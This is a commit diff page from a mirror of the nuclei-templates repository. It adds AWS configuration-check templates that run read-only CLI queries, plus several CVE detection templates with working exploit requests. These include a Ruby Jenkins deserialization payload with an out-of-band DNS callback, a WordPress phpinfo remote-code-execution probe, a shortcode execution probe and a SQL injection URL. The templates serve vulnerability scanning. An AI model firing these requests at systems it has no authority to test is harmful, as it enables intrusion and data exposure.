daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into main

patch-13
aayush2561 2024-10-28 14:19:18 +05:45 committed by GitHub
parent a5f4de9acd 512464afb5
commit 650e8fda9a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
18 changed files with 789 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
.new-additions
View File

@ -1,3 +1,9 @@
cloud/aws/dms/dms-multi-az.yaml
cloud/aws/dms/dms-public-access.yaml
cloud/aws/dms/dms-version-upgrade.yaml
cloud/aws/ebs/ebs-encryption-disabled.yaml
cloud/aws/firehose/firehose-server-destination-encryption.yaml
cloud/aws/firehose/firehose-server-side-encryption.yaml
dast/cves/2024/CVE-2024-2961.yaml
http/cnvd/2024/CNVD-2024-38747.yaml
http/cves/2015/CVE-2015-8562.yaml
@ -25,6 +31,7 @@ http/cves/2023/CVE-2023-40931.yaml
http/cves/2023/CVE-2023-43373.yaml
http/cves/2023/CVE-2023-5558.yaml
http/cves/2023/CVE-2023-5561.yaml
http/cves/2024/CVE-2016-9299.yaml
http/cves/2024/CVE-2024-22476.yaml
http/cves/2024/CVE-2024-32735.yaml
http/cves/2024/CVE-2024-32736.yaml
@ -43,17 +50,22 @@ http/cves/2024/CVE-2024-48914.yaml
http/cves/2024/CVE-2024-49757.yaml
http/cves/2024/CVE-2024-5910.yaml
http/cves/2024/CVE-2024-8698.yaml
http/cves/2024/CVE-2024-9061.yaml
http/cves/2024/CVE-2024-9234.yaml
http/cves/2024/CVE-2024-9593.yaml
http/cves/2024/CVE-2024-9617.yaml
http/cves/2024/CVE-2024-9796.yaml
http/default-logins/apache/doris-default-login.yaml
http/default-logins/sato/sato-default-login.yaml
http/default-logins/zebra/zebra-printer-default-login.yaml
http/exposed-panels/1password-scim-panel.yaml
http/exposed-panels/danswer-panel.yaml
http/exposed-panels/freescout-panel.yaml
http/exposed-panels/nagios/nagios-logserver-panel.yaml
http/exposed-panels/olympic-panel.yaml
http/exposed-panels/onedev-panel.yaml
http/exposed-panels/paloalto-expedition-panel.yaml
http/exposed-panels/reolink-panel.yaml
http/exposed-panels/sqlpad-panel.yaml
http/exposed-panels/traccar-panel.yaml
http/exposed-panels/txadmin-panel.yaml
@ -72,6 +84,7 @@ http/technologies/mirth-connect-detect.yaml
http/technologies/oracle-fusion-detect.yaml
http/technologies/salesforce-b2c-commerce-webdav.yaml
http/technologies/wordpress/plugins/burst-statistics.yaml
http/vulnerabilities/hcm/hcm-cloud-lfi.yaml
http/vulnerabilities/nagios/nagios-xi-xss.yaml
http/vulnerabilities/wordpress/application-pass-xss.yaml
http/vulnerabilities/wordpress/wp-footnote-xss.yaml

59
cloud/aws/dms/dms-multi-az.yaml Normal file
View File

@ -0,0 +1,59 @@
id: dms-multi-az
info:
name: DMS Multi-AZ Not Enabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon Database Migration Service (DMS) replication instances are using Multi-AZ deployment configurations to provide High Availability (HA) through automatic failover to standby replicas in the event of a failure such as an Availability Zone (AZ) outage, an internal hardware or network outage, a software failure or in case of a planned maintenance session
impact: |
Not enabling Multi-AZ for Database Migration Service can lead to increased downtime and data loss risks during outages, compromising the availability and reliability of your database operations.
remediation: |
Enable Multi-AZ support for your Database Migration Service to enhance availability and resilience, ensuring automatic failover and reducing downtime during outages.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/multi-az.html
- https://docs.aws.amazon.com/cli/latest/reference/dms/describe-replication-instances.html
tags: cloud,devops,aws,amazon,dms,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let ReplicationInstances of iterate(template.replications)){
set("replication", ReplicationInstances)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json
extractors:
- type: json
name: replications
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].MultiAZ" --output json
matchers:
- type: word
words:
- "false"
extractors:
- type: dsl
dsl:
- '"DMS Multi-AZ " + replication + " is not enabled"'
# digest: 4a0a004730450220052c0de2e02b60b42a79e7d02c2e38f90423664ca041b2dddd276b0f0b55d3fa022100a434388c051cee8dfa5e4d962699aa4abdc66971013a62f1cc3c85a9c434519b:922c64590222798bb761d5b6d8e72950

59
cloud/aws/dms/dms-public-access.yaml Normal file
View File

@ -0,0 +1,59 @@
id: dms-public-access
info:
name: Publicly Accessible DMS Replication Instances
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon Database Migration Service (DMS) are not publicly accessible from the Internet in order to avoid exposing private data and minimize security risks.
impact: |
Publicly accessible DMS replication instances expose your database to unauthorized access and potential attacks, increasing the risk of data breaches and compromising the security of sensitive information.
remediation: |
Restrict access to your DMS replication instances by configuring security groups and network access controls to allow connections only from trusted IP addresses and private subnets, ensuring that they are not publicly accessible.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/publicly-accessible.html
- https://docs.aws.amazon.com/dms/latest/userguide/CHAP_ReplicationInstance.html
tags: cloud,devops,aws,amazon,dms,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let ReplicationInstances of iterate(template.replications)){
set("replication", ReplicationInstances)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json
extractors:
- type: json
name: replications
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].PubliclyAccessible" --output json
matchers:
- type: word
words:
- "true"
extractors:
- type: dsl
dsl:
- '"DMS Replication Instances " + replication + " Publicly Accessible"'
# digest: 4b0a00483046022100c2e4b02073095257867ae2f880894485ce4395d427a0f5797433d453d16557b4022100f11bea387537d175614dcbe4c0e1f7a3d19cfe18b2eb5177157de179677aaea4:922c64590222798bb761d5b6d8e72950

59
cloud/aws/dms/dms-version-upgrade.yaml Normal file
View File

@ -0,0 +1,59 @@
id: dms-version-upgrade
info:
name: DMS Auto Minor Version Upgrade
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon Database Migration Service (DMS) replication instances have the Auto Minor Version Upgrade feature enabled in order to receive automatically minor engine upgrades.
impact: |
Not enabling DMS Auto Minor Version Upgrade can lead to running outdated database versions, increasing vulnerability to security risks and bugs, while missing out on performance improvements and new features provided in minor updates.
remediation: |
Enable DMS Auto Minor Version Upgrade to automatically apply minor version updates, ensuring your database is always up-to-date with the latest security patches, performance enhancements, and bug fixes.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/auto-minor-version-upgrade.html
- https://docs.aws.amazon.com/cli/latest/reference/dms/index.html
tags: cloud,devops,aws,amazon,dms,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let ReplicationInstances of iterate(template.replications)){
set("replication", ReplicationInstances)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json
extractors:
- type: json
name: replications
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].AutoMinorVersionUpgrade" --output json
matchers:
- type: word
words:
- "false"
extractors:
- type: dsl
dsl:
- '"DMS Auto Minor Version Upgrade " + replication + " not enabled"'
# digest: 4b0a00483046022100e170aa216555156ddf46a196e60d6985d37d29f32146f0bfeaeef1ceba09e73c022100f95487bc9c2f2bfe9288a9362f868268f3bb7cd963b36c44be1b6629a06b3a6b:922c64590222798bb761d5b6d8e72950

61
cloud/aws/ebs/ebs-encryption-disabled.yaml Normal file
View File

@ -0,0 +1,61 @@
id: ebs-encryption-disabled
info:
name: EBS Encryption - Disabled
author: DhiyaneshDK
severity: high
description: |
Ensure that all your Amazon Elastic Block Store (EBS) volumes are encrypted in order to meet security and compliance requirements. With encryption enabled, your EBS volumes can hold sensitive, confidential, and critical data.
impact: |
Disabling AWS EBS encryption exposes sensitive data to unauthorized access, increasing the risk of data breaches and compliance violations.
remediation: |
Enable encryption for all existing EBS volumes and ensure that all new volumes created are configured to use encryption by default. Additionally, update any snapshots to be encrypted and use AWS Key Management Service (KMS) to manage encryption keys securely.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/EBS/ebs-encrypted.html
- http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html
tags: cloud,devops,aws,amazon,ebs,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let VolumesVolumeId of iterate(template.volumes)){
set("volume", VolumesVolumeId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws ec2 describe-volumes --region $region --query 'Volumes[*].VolumeId' --output json
extractors:
- type: json
name: volumes
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws ec2 describe-volumes --region $region --volume-ids $volume --query 'Volumes[*].Encrypted' --output text
matchers:
- type: word
words:
- "False"
extractors:
- type: dsl
dsl:
- '"EBS Encryption " + volumes + " is Disabled"'
# digest: 4a0a00473045022100fe98ba08fe06c9398f905a0651ac60c5cfbdbeaf2fa0c524aa9d2c0e29d3c75902200ab089e32558f42e2a7f8d5fafb3e309dfe261bad4e417532734222a7cbaa7cf:922c64590222798bb761d5b6d8e72950

59
cloud/aws/firehose/firehose-server-destination-encryption.yaml Normal file
View File

@ -0,0 +1,59 @@
id: firehose-server-destination-encryption
info:
name: Firehose Delivery Stream Destination Encryption - Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Kinesis Firehose delivery stream data records are encrypted at destination (i.e. Amazon S3) in order to meet regulatory requirements and protect your Firehose data at rest.
impact: |
Disabling encryption for Firehose delivery stream destinations can lead to sensitive data being stored unencrypted, increasing the risk of data exposure and unauthorized access.
remediation: |
Enable encryption for Firehose delivery stream destinations to ensure that all data is encrypted at rest, safeguarding sensitive information from unauthorized access and potential data breaches.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/Firehose/delivery-stream-destination-encryption.html
- https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingKMSEncryption.html
tags: cloud,devops,aws,amazon,firehose,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DeliveryStreamNames of iterate(template.deliverys)){
set("delivery", DeliveryStreamNames)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws firehose list-delivery-streams --region $region --query 'DeliveryStreamNames' --output json
extractors:
- type: json
name: deliverys
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws firehose describe-delivery-stream --region $region --delivery-stream-name $delivery --query 'DeliveryStreamDescription.Destinations[*].ExtendedS3DestinationDescription.EncryptionConfiguration' --output json
matchers:
- type: word
words:
- "NoEncryption"
extractors:
- type: dsl
dsl:
- '"Firehose Delivery Stream Destination " + delivery + " Encryption is Disabled"'
# digest: 490a0046304402201742209d94926b372dbccead7a059d88a973ed2020c9a79e7015331a3e66b20002206a6c98cac36c76d372585674da6f65d3dd50ee0053363cb2f9ffeefa9bf88460:922c64590222798bb761d5b6d8e72950

59
cloud/aws/firehose/firehose-server-side-encryption.yaml Normal file
View File

@ -0,0 +1,59 @@
id: firehose-server-side-encryption
info:
name: Firehose Delivery Stream Server-Side Encryption - Disabled
author: DhiyaneshDK
severity: high
description: |
Ensure that your Amazon Kinesis Data Firehose delivery streams are encrypted using Server-Side Encryption.
impact: |
Disabling server-side encryption for Firehose delivery streams can result in unencrypted data being stored, exposing sensitive information to unauthorized access and increasing the risk of data breaches.
remediation: |
Enable server-side encryption for Firehose delivery streams to ensure that data is securely encrypted at rest, protecting sensitive information from unauthorized access.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/Firehose/delivery-stream-encrypted-with-kms-customer-master-keys.html
- https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingKMSEncryption.html
tags: cloud,devops,aws,amazon,firehose,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DeliveryStreamNames of iterate(template.deliverys)){
set("delivery", DeliveryStreamNames)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws firehose list-delivery-streams --region $region --query 'DeliveryStreamNames' --output json
extractors:
- type: json
name: deliverys
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws firehose describe-delivery-stream --region $region --delivery-stream-name $delivery --query 'DeliveryStreamDescription.DeliveryStreamEncryptionConfiguration.KeyType' --output json
matchers:
- type: word
words:
- "null"
extractors:
- type: dsl
dsl:
- '"Firehose delivery stream " + delivery + " is not encrypted using SSE"'
# digest: 4a0a00473045022100c27f022ba1deaf796d3a13a7fff3ccc19f5c8ccafb2406a5632741e33645b130022018b443d8917635142e697c54efccbdd18fd4873b7cc9fdebac19537f0ddbcdf7:922c64590222798bb761d5b6d8e72950

3
cves.json
View File

@ -2717,10 +2717,13 @@
{"ID":"CVE-2024-8877","Info":{"Name":"Riello Netman 204 - SQL Injection","Severity":"critical","Description":"The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8877.yaml"}
{"ID":"CVE-2024-8883","Info":{"Name":"Keycloak - Open Redirect","Severity":"medium","Description":"A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2024/CVE-2024-8883.yaml"}
{"ID":"CVE-2024-9014","Info":{"Name":"pgAdmin 4 - Authentication Bypass","Severity":"critical","Description":"pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9014.yaml"}
{"ID":"CVE-2024-9061","Info":{"Name":"WP Popup Builder Popup Forms and Marketing Lead Generation \u003c= 1.3.5 - Arbitrary Shortcode Execution","Severity":"high","Description":"The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-9061.yaml"}
{"ID":"CVE-2024-9234","Info":{"Name":"GutenKit \u003c= 2.1.0 - Arbitrary File Upload","Severity":"critical","Description":"The GutenKit Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-9234.yaml"}
{"ID":"CVE-2024-9463","Info":{"Name":"PaloAlto Networks Expedition - Remote Code Execution","Severity":"critical","Description":"An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9463.yaml"}
{"ID":"CVE-2024-9465","Info":{"Name":"Palo Alto Expedition - SQL Injection","Severity":"high","Description":"An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-9465.yaml"}
{"ID":"CVE-2024-9593","Info":{"Name":"Time Clock \u003c= 1.2.2 \u0026 Time Clock Pro \u003c= 1.1.4 - Remote Code Execution","Severity":"high","Description":"The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-9593.yaml"}
{"ID":"CVE-2024-9617","Info":{"Name":"Danswer - Insecure Direct Object Reference","Severity":"medium","Description":"The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-9617.yaml"}
{"ID":"CVE-2024-9796","Info":{"Name":"WordPress WP-Advanced-Search \u003c= 3.3.9 - SQL Injection","Severity":"critical","Description":"The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-9796.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2004-2687","Info":{"Name":"Distccd v1 - Remote Code Execution","Severity":"high","Description":"distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"network/cves/2004/CVE-2004-2687.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}

2
cves.json-checksum.txt
View File

@ -1 +1 @@
13888324a39d31ce90973d926d640532
2d385a9a80b48d960e7e3c78bad06e09

123
http/cves/2024/CVE-2016-9299.yaml Normal file
View File

@ -0,0 +1,123 @@
id: CVE-2016-9299
info:
name: Jenkins CLI - HTTP Java Deserialization
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb
- https://nvd.nist.gov/vuln/detail/CVE-2016-9299
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-9299
cwe-id: CWE-90
cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*
metadata:
max-request: 1
verified: true
vendor: jenkins
product: jenkins
shodan-query: product:"jenkins"
fofa-query: icon_hash=81586312
tags: cve,cve2016,rce,deserialization
variables:
oast: "{{interactsh-url}}"
code:
- engine:
- rb
- ruby # requires ruby to be pre-installed on system running nuclei
source: |
require 'socket'
require 'base64'
# Define environment variables for host details (make sure they are properly set in your environment)
$Hostname = ENV['Hostname']
$Host = ENV['Host']
$Port = ENV['Port']
interactsh = (ENV['oast']).ljust(45,'/')
url_dns = "aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff74002d657761776a7763737778766b6a66737763716c69316673737632357271306438642e6f6173742e6f6e6c696e6574000071007e0005740004687474707078740034687474703a2f2f657761776a7763737778766b6a66737763716c69316673737632357271306438642e6f6173742e6f6e6c696e6578"
$decoded_url_dns = [url_dns].pack("H*")
$decoded_url_dns = $decoded_url_dns.gsub! "ewawjwcswxvkjfswcqli1fssv25rq0d8d.oast.online", interactsh
# Step 1: Send the download request without waiting for a response or closing the socket
def send_download_request(host, port)
download_socket = TCPSocket.new(host, port)
download_request = <<~REQ
POST /cli HTTP/1.1
Host: #{$Hostname}
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0\r\n
REQ
#puts "Sending Download Request..."
download_socket.write(download_request)
# Return the open socket so we can read from it later
return download_socket
end
# Step 2: Send the upload request
def send_upload_request(host, port)
socket = TCPSocket.new(host, port)
# Base64 decoded payload for upload request
chunked_payload = "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00\x01\x55" + $decoded_url_dns
upload_request = <<~REQ
POST /cli HTTP/1.1
Host: #{$Hostname}
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93
Side: upload
Content-Type: application/octet-stream
Content-Length: #{chunked_payload.bytesize}\r\n
REQ
#puts "Sending Upload Request..."
socket.write(upload_request)
# Send the binary data (payload)
socket.write(chunked_payload)
# Read and print the response for the upload request
response = socket.readpartial(1024)
#puts "Received from server (upload response): #{response}"
# Close the socket for upload request
socket.close
end
# Step 3: After upload request, read the download request's response
def read_download_response(socket)
#puts "Reading Download Request Response..."
response = socket.readpartial(1024)
socket.close
response
end
# Combined steps to perform the operations in the required order
# Step 1: Send download request (don't wait for response, keep the socket open)
download_socket = send_download_request($Host, $Port)
# Step 2: Send upload request
send_upload_request($Host, $Port)
# Print the download response
puts read_download_response(download_socket)
matchers:
- type: dsl
dsl:
- "contains(response,'hudson.remoting.UserRequest')"
- 'contains(interactsh_protocol, "dns")'
condition: and
# digest: 490a0046304402203cca921300c636eb8d986136c3b5dd567649cc0e956e016278f9e8e6d2e2f14602207e558f218d7293d1e2d1fa942bc313b240086e5f74545143c5553d3d044b4831:922c64590222798bb761d5b6d8e72950

3
http/cves/2024/CVE-2024-49757.yaml
View File

@ -46,5 +46,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502207d49c3297e84b73e97ee50057e586be8609be53b012523511299887a50cad877022100b4437a3ff67854693adb66be76d5b30547c18a9596223a06685fa02932bbc805:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100b4f85fbe7f82396cb84d4980b7cab502297c575cda88ad470169b72b87f641cf022100b3da53c83ed560855d843013d6f9ea158f906252de2100fcb836ccf154283dc8:922c64590222798bb761d5b6d8e72950

61
http/cves/2024/CVE-2024-9061.yaml Normal file
View File

@ -0,0 +1,61 @@
id: CVE-2024-9061
info:
name: WP Popup Builder Popup Forms and Marketing Lead Generation <= 1.3.5 - Arbitrary Shortcode Execution
author: s4e-io
severity: high
description: |
The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-9061
- https://www.wordfence.com/threat-intel/vulnerabilities/id/0cac1dc0-87dc-43eb-9db1-638a91200b43?source=cve
- https://github.com/RandomRobbieBF/CVE-2024-9061
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2024-9061
cwe-id: CWE-94
epss-score: 0.00046
epss-percentile: 0.18015
metadata:
max-request: 2
verified: true
vendor: themehunk
product: wp-popup-builder
framework: wordpress
fofa-query: body="/wp-content/plugins/wp-popup-builder/"
tags: cve,cve2024,wp,wordpress,wp-plugin,wp-popup-builder,shortcode
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/wp-popup-builder")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=shortcode_Api_Add&shortcode=%43%56%45%2d%32%30%32%34%2d%39%30%36%31
matchers:
- type: dsl
dsl:
- 'len(body) == 13'
- 'contains(body, "CVE-2024-9061")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100f80fec38e7c5f649695bac35530600b4fbfa1daa9782d746571908c193ec333d022100f9b434ac3748d54c493f2ad2d7bf045e53c97e1abd079858c054b0ce2f03e0e5:922c64590222798bb761d5b6d8e72950

72
http/cves/2024/CVE-2024-9593.yaml Normal file
View File

@ -0,0 +1,72 @@
id: CVE-2024-9593
info:
name: Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution
author: s4e-io
severity: high
description: |
The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/detail/time-clock-122-unauthenticated-limited-remote-code-execution
- https://nvd.nist.gov/vuln/detail/CVE-2024-9593
- https://github.com/RandomRobbieBF/CVE-2024-9593
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id: CVE-2024-9593
cwe-id: CWE-94
epss-score: 0.00052
epss-percentile: 0.21567
metadata:
max-request: 2
verified: true
vendor: scott_paterson
product: time-clock & time-clock-pro
framework: wordpress
fofa-query: body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/"
tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/time-clock")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
function=phpinfo
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'
# digest: 4a0a00473045022065893bee95b4cb863eb698bc33aef1849b6971633dc55d38e63de16d89b20d8e022100916a86a5a8ba50bef07761ba790afe74cf0ab95d95dfc115f03e95f72a607648:922c64590222798bb761d5b6d8e72950

51
http/cves/2024/CVE-2024-9796.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2024-9796
info:
name: WordPress WP-Advanced-Search <= 3.3.9 - SQL Injection
author: s4e-io
severity: critical
description: |
The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
reference:
- https://wpscan.com/vulnerability/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b/
- https://github.com/RandomRobbieBF/CVE-2024-9796
- https://nvd.nist.gov/vuln/detail/CVE-2024-9796
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-9796
cwe-id: CWE-89
epss-score: 0.00106
epss-percentile: 0.44161
metadata:
max-request: 1
verified: true
vendor: mathieu_chartier
product: wp-advanced-search
framework: wordpress
fofa-query: body="/wp-content/plugins/wp-advanced-search/"
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-advanced-search
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "Table '([a-zA-Z0-9_]+)\\.wp_users' doesn't exist"
- type: status
status:
- 200
extractors:
- type: regex
part: body
name: database_name
regex:
- "([a-zA-Z0-9_]+)\\.wp_users"
